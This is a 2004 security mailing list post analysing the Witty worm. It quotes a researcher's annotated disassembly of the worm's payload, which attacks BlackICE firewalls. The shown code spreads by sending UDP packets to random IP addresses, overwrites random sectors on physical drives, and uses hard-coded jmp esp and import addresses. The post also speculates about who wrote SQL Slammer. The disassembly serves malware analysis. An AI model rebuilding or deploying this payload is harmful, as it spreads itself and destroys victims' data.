Full Disclosure mailing list archives
RE: Any dissasemblies of the Witty worm yet?
From: "Disclosure From OSSI" <disclosure () ossecurity ca>
Date: Sat, 20 Mar 2004 23:47:21 -0500
From the quick analysis of this worm (retrieved from
http://isc.incidents.org/diary.html?date=2004-03-20), it seems that it bears strange similarity with SQL Slammer for the following points: 1. It uses the same "push ascii" format as SQL Slammer, for example "push 6B636F73h" in this worm. 2. It uses hard-coded import addresses (listed below) as SQL Slammer. 3. If someone can trace the origin of this worm, it might shed light on the origin of SQL Slammer as well? 4. When SQL Slammer hit, some suspected that LION (http://www.cnhonker.com/index.php) did it and he refused the credit. From the latest articles on the http://www.cnhonker.com/index.php website, LION is probably not the person who released SQL Slammer, if and only if the writer of "witty" worm is the same writer for SQL Slammer since Lion's methods for importing functions are much more sophisticated than hard-coded import addresses shown in this worm. If I have time, I might provide a run-time analysis (and dissembly) of this worm within the context of blackd.exe. For now, just match up the addresses used in the dissembly by Kostya. Peter Huang http://www.ossecurity.ca/ = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = Analyze exploit file c:\temp\temp.bin with size 0000040f Found: offset 000000ef value 5e0d409c in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e0d409c: Rva 000d409c is address of import fx: KERNEL32.dll!GetModuleHandleA Found: offset 00000106 value 5e0d4098 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e0d4098: Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress Found: offset 00000121 value 5e0d4098 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e0d4098: Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress Found: offset 0000014a value 5e0d4098 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e0d4098: Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress Found: offset 00000164 value 5e0d409c in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e0d409c: Rva 000d409c is address of import fx: KERNEL32.dll!GetModuleHandleA Found: offset 0000017f value 5e0d4098 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e0d4098: Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress Found: offset 00000241 value 5e0d40dc in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e0d40dc: Rva 000d40dc is address of import fx: KERNEL32.dll!CreateFileA Found: offset 0000027a value 5e0d40c4 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e0d40c4: Rva 000d40c4 is address of import fx: KERNEL32.dll!SetFilePointer Found: offset 00000294 value 5e0d4094 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e0d4094: Rva 000d4094 is address of import fx: KERNEL32.dll!WriteFile Found: offset 0000029c value 5e0d4038 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e0d4038: Rva 000d4038 is address of import fx: KERNEL32.dll!CloseHandle EntryPoint Info: Found: offset 000002a7 value 5e077663 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll Datails about 5e077663: Rva 00077663 value 0759e4ff 5E077663: FF E4 jmpn esp
-----Original Message----- From: Kostya Kortchinsky [mailto:kostya.kortchinsky () renater fr] Sent: Saturday, March 20, 2004 12:39 PM To: bugtraq () securityfocus com Subject: Re: Any dissasemblies of the Witty worm yet? Here is some preliminary work, I don't claim it to be exact, since the API calls are guessed at the moment (I still have to get BlackICE), but it should give a pretty good idea on how the thing work. The WriteFile might be ReadFile (which is the way Symantec sees it in their analysis), but in my opinion the GENERIC_WRITE flag (and the fact the memory at 0x5e000000 might be code section, then not writeable) makes me think it writes arbitrary places of random physical disks - with the consequences one can imagine. Correct me if I am wrong, I would like to receive feedback about this. Regards, Kostya Kortchinsky CERT RENATER Nicholas Weaver wrote:Has anyone done a dissassembly of the "Witty" worm yet? http://isc.incidents.org/diary.html?date=2004-03-20http://securityresponse.symantec.com/avcenter/venc/data/w32.witty. worm.htmlusing the http://seclists.org/lists/bugtraq/2004/Mar/0181.html recent bug in BlackICE/RealSecure? We are seeing a lot of activity from this worm, although even a small infection would generate a LOT of traffic (a side-effect of bandwidth-limited worms, such as single-packet UDP worms). Thanks.seg000:000000D1 ; ------------------------------------------------------------------ --------- seg000:000000D1 seg000:000000D1 loc_D1: ; CODE XREF: seg000:000002ABj seg000:000000D1 89 E7 mov edi, esp seg000:000000D3 8B 7F 14 mov edi, [edi+14h] seg000:000000D6 83 C7 08 add edi, 8 seg000:000000D9 81 C4 E8 FD FF FF add esp, 0FFFFFDE8h seg000:000000DF 31 C9 xor ecx, ecx seg000:000000E1 66 B9 33 32 mov cx, 3233h ; 32 seg000:000000E5 51 push ecx seg000:000000E6 68 77 73 32 5F push 5F327377h ; ws2_ seg000:000000EB 54 push esp seg000:000000EC db 3Eh seg000:000000EC 3E FF 15 9C 40 0D+ call dword ptr ds:5E0D409Ch ; Probably LoadLibrary seg000:000000F3 89 C3 mov ebx, eax seg000:000000F5 31 C9 xor ecx, ecx seg000:000000F7 66 B9 65 74 mov cx, 7465h ; et seg000:000000FB 51 push ecx seg000:000000FC 68 73 6F 63 6B push 6B636F73h ; sock seg000:00000101 54 push esp seg000:00000102 53 push ebx seg000:00000103 db 3Eh seg000:00000103 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress seg000:0000010A 6A 11 push 11h ; IPPROTO_UDP seg000:0000010C 6A 02 push 2 ; SOCK_DGRAM seg000:0000010E 6A 02 push 2 ; AF_INET seg000:00000110 FF D0 call eax ; socket() seg000:00000112 89 C6 mov esi, eax seg000:00000114 31 C9 xor ecx, ecx seg000:00000116 51 push ecx seg000:00000117 68 62 69 6E 64 push 646E6962h ; bind seg000:0000011C 54 push esp seg000:0000011D 53 push ebx seg000:0000011E db 3Eh seg000:0000011E 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress seg000:00000125 31 C9 xor ecx, ecx seg000:00000127 51 push ecx seg000:00000128 51 push ecx seg000:00000129 51 push ecx ; sin.sin_addr.s_addr = INADDR_ANY seg000:0000012A 81 E9 FE FF F0 5F sub ecx, 5FF0FFFEh ; 0xa00f0002 seg000:00000130 51 push ecx ; sin.sin_family = AF_INET seg000:00000130 ; sin.sin_port = htons(4000) seg000:00000131 89 E1 mov ecx, esp seg000:00000133 6A 10 push 10h ; sizeof(struct sockaddr) seg000:00000135 51 push ecx ; &sin seg000:00000136 56 push esi ; s seg000:00000137 FF D0 call eax ; bind() seg000:00000139 31 C9 xor ecx, ecx seg000:0000013B 66 B9 74 6F mov cx, 6F74h ; to seg000:0000013F 51 push ecx seg000:00000140 68 73 65 6E 64 push 646E6573h ; send seg000:00000145 54 push esp seg000:00000146 53 push ebx seg000:00000147 db 3Eh seg000:00000147 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress seg000:0000014E 89 C3 mov ebx, eax seg000:00000150 83 C4 3C add esp, 3Ch seg000:00000153 seg000:00000153 loc_153: ; CODE XREF: seg000:000002A2j seg000:00000153 31 C9 xor ecx, ecx seg000:00000155 51 push ecx seg000:00000156 68 65 6C 33 32 push 32336C65h ; el32 seg000:0000015B 68 6B 65 72 6E push 6E72656Bh ; kern seg000:00000160 54 push esp seg000:00000161 db 3Eh seg000:00000161 3E FF 15 9C 40 0D+ call dword ptr ds:5E0D409Ch ; Probably LoadLibrary seg000:00000168 31 C9 xor ecx, ecx seg000:0000016A 51 push ecx seg000:0000016B 68 6F 75 6E 74 push 746E756Fh ; ount seg000:00000170 68 69 63 6B 43 push 436B6369h ; ickC seg000:00000175 68 47 65 74 54 push 54746547h ; GetT seg000:0000017A 54 push esp seg000:0000017B 50 push eax seg000:0000017C db 3Eh seg000:0000017C 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress seg000:00000183 FF D0 call eax ; GetTickCount() seg000:00000185 89 C5 mov ebp, eax seg000:00000187 83 C4 1C add esp, 1Ch seg000:0000018A 31 C9 xor ecx, ecx seg000:0000018C 81 E9 E0 B1 FF FF sub ecx, 0FFFFB1E0h ; 0x4e20 seg000:00000192 seg000:00000192 loc_192: ; CODE XREF: seg000:000001F8j seg000:00000192 ; seg000:00000255j seg000:00000192 51 push ecx seg000:00000193 31 C0 xor eax, eax seg000:00000195 2D 03 BC FC FF sub eax, 0FFFCBC03h ; 0x343fd seg000:0000019A F7 E5 mul ebp seg000:0000019C 2D 3D 61 D9 FF sub eax, 0FFD9613Dh ; 0x269ec3 seg000:000001A1 89 C1 mov ecx, eax ; rand() function, without the 0x7fff mask, shift coming afterwards seg000:000001A1 ; srand() done with GetTickCount() seg000:000001A3 31 C0 xor eax, eax seg000:000001A5 2D 03 BC FC FF sub eax, 0FFFCBC03h seg000:000001AA F7 E1 mul ecx seg000:000001AC 2D 3D 61 D9 FF sub eax, 0FFD9613Dh seg000:000001B1 89 C5 mov ebp, eax seg000:000001B3 31 D2 xor edx, edx seg000:000001B5 52 push edx seg000:000001B6 52 push edx seg000:000001B7 C1 E9 10 shr ecx, 10h seg000:000001BA 66 89 C8 mov ax, cx seg000:000001BD 50 push eax ; to.sin_addr.s_addr = (rand() << 16) | rand() seg000:000001BE 31 C0 xor eax, eax seg000:000001C0 2D 03 BC FC FF sub eax, 0FFFCBC03h seg000:000001C5 F7 E5 mul ebp seg000:000001C7 2D 3D 61 D9 FF sub eax, 0FFD9613Dh seg000:000001CC 89 C5 mov ebp, eax seg000:000001CE 30 E4 xor ah, ah seg000:000001D0 B0 02 mov al, 2 seg000:000001D2 50 push eax ; to.sin_family = AF_INET seg000:000001D2 ; to.sin_port = rand() seg000:000001D3 89 E0 mov eax, esp seg000:000001D5 6A 10 push 10h ; sizeof(struct sockaddr) seg000:000001D7 50 push eax ; &to seg000:000001D8 31 C0 xor eax, eax seg000:000001DA 50 push eax ; flags seg000:000001DB 2D 03 BC FC FF sub eax, 0FFFCBC03h seg000:000001E0 F7 E5 mul ebp seg000:000001E2 2D 3D 61 D9 FF sub eax, 0FFD9613Dh seg000:000001E7 89 C5 mov ebp, eax seg000:000001E9 C1 E8 17 shr eax, 17h seg000:000001EC 80 C4 03 add ah, 3 seg000:000001EF 50 push eax ; len = 0x300 + (rand() >> 7) seg000:000001F0 57 push edi ; buf seg000:000001F1 56 push esi ; s seg000:000001F2 FF D3 call ebx ; sendto() seg000:000001F4 83 C4 10 add esp, 10h seg000:000001F7 59 pop ecx seg000:000001F8 E2 98 loop loc_192 seg000:000001FA 31 C0 xor eax, eax seg000:000001FC 2D 03 BC FC FF sub eax, 0FFFCBC03h seg000:00000201 F7 E5 mul ebp seg000:00000203 2D 3D 61 D9 FF sub eax, 0FFD9613Dh seg000:00000208 89 C5 mov ebp, eax seg000:0000020A C1 E8 10 shr eax, 10h seg000:0000020D 80 E4 07 and ah, 7 seg000:00000210 80 CC 30 or ah, 30h ; 0x30 | (rand() & 7) seg000:00000213 B0 45 mov al, 45h ; 'E' ; E seg000:00000215 50 push eax seg000:00000216 68 44 52 49 56 push 56495244h ; DRIV seg000:0000021B 68 49 43 41 4C push 4C414349h ; ICAL seg000:00000220 68 50 48 59 53 push 53594850h ; PHYS seg000:00000225 68 5C 5C 2E 5C push 5C2E5C5Ch ; \\.\ seg000:00000225 ; we get here \\.\PHYSICALDRIVE0 to \\.\PHYSICALDRIVE7 seg000:0000022A 89 E0 mov eax, esp seg000:0000022C 31 C9 xor ecx, ecx seg000:0000022E 51 push ecx ; NULL seg000:0000022F B2 20 mov dl, 20h ; ' ' seg000:00000231 C1 E2 18 shl edx, 18h seg000:00000234 52 push edx ; FILE_FLAG_NO_BUFFERING (0x20000000) seg000:00000235 6A 03 push 3 ; OPEN_EXISTING seg000:00000237 51 push ecx ; NULL seg000:00000238 6A 03 push 3 ; FILE_SHARE_READ | FILE_SHARE_WRITE seg000:0000023A D1 E2 shl edx, 1 seg000:0000023C 52 push edx ; GENERIC_WRITE (0x40000000) seg000:0000023D 50 push eax ; lpFileName seg000:0000023E db 3Eh seg000:0000023E 3E FF 15 DC 40 0D+ call dword ptr ds:5E0D40DCh ; Probably CreateFile seg000:00000245 83 C4 14 add esp, 14h seg000:00000248 31 C9 xor ecx, ecx seg000:0000024A 81 E9 E0 B1 FF FF sub ecx, 0FFFFB1E0h ; 0x4e20 seg000:00000250 3D FF FF FF FF cmp eax, 0FFFFFFFFh seg000:00000255 0F 84 37 FF FF FF jz loc_192 seg000:0000025B 56 push esi ; (saving socket) seg000:0000025C 89 C6 mov esi, eax seg000:0000025E 31 C0 xor eax, eax seg000:00000260 50 push eax ; FILE_BEGIN seg000:00000261 50 push eax ; NULL seg000:00000262 2D 03 BC FC FF sub eax, 0FFFCBC03h seg000:00000267 F7 E5 mul ebp seg000:00000269 2D 3D 61 D9 FF sub eax, 0FFD9613Dh seg000:0000026E 89 C5 mov ebp, eax seg000:00000270 D1 E8 shr eax, 1 seg000:00000272 66 89 C8 mov ax, cx seg000:00000275 50 push eax ; (rand() << 15) | 0x4e20 seg000:00000276 56 push esi ; hFile seg000:00000277 db 3Eh seg000:00000277 3E FF 15 C4 40 0D+ call dword ptr ds:5E0D40C4h ; Probably SetFilePointer seg000:00000277 5E ; (really not sure about this one) seg000:0000027E 31 C9 xor ecx, ecx seg000:00000280 51 push ecx ; 0 seg000:00000281 89 E2 mov edx, esp seg000:00000283 51 push ecx ; NULL seg000:00000284 52 push edx ; lpNumberOfBytesWritten seg000:00000285 B5 80 mov ch, 80h ; 'Ç' seg000:00000287 D1 E1 shl ecx, 1 seg000:00000289 51 push ecx ; nNumberOfBytesToWrite (0x10000) seg000:0000028A B1 5E mov cl, 5Eh ; '^' seg000:0000028C C1 E1 18 shl ecx, 18h seg000:0000028F 51 push ecx ; lpBuffer (0x5e000000) seg000:00000290 56 push esi ; hFile seg000:00000291 db 3Eh seg000:00000291 3E FF 15 94 40 0D+ call dword ptr ds:5E0D4094h ; Probably WriteFile seg000:00000298 56 push esi ; hObject seg000:00000299 db 3Eh seg000:00000299 3E FF 15 38 40 0D+ call dword ptr ds:5E0D4038h ; Probably CloseHandle seg000:000002A0 5E pop esi seg000:000002A1 5E pop esi ; (restoring socket) seg000:000002A2 E9 AC FE FF FF jmp loc_153 seg000:000002A2 ; ------------------------------------------------------------------ --------- seg000:000002A7 63 76 07 5E dd 5E077663h seg000:000002AB ; ------------------------------------------------------------------ --------- seg000:000002AB E9 21 FE FF FF jmp loc_D1 seg000:000002AB ; ------------------------------------------------------------------ ---------
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Any dissasemblies of the Witty worm yet? Disclosure From OSSI (Mar 20)
- <Possible follow-ups>
- RE: RE: Any dissasemblies of the Witty worm yet? Hugh Mann (Mar 21)
- Re: RE: Any dissasemblies of the Witty worm yet? Matthew Murphy (Mar 21)
- Re: RE: Any dissasemblies of the Witty worm yet? Byron Copeland (Mar 21)
- RE: RE: Any dissasemblies of the Witty worm yet? Disclosure From OSSI (Mar 22)
- RE: RE: Any dissasemblies of the Witty worm yet? Byron Copeland (Mar 23)
- Re: RE: Any dissasemblies of the Witty worm yet? Matthew Murphy (Mar 21)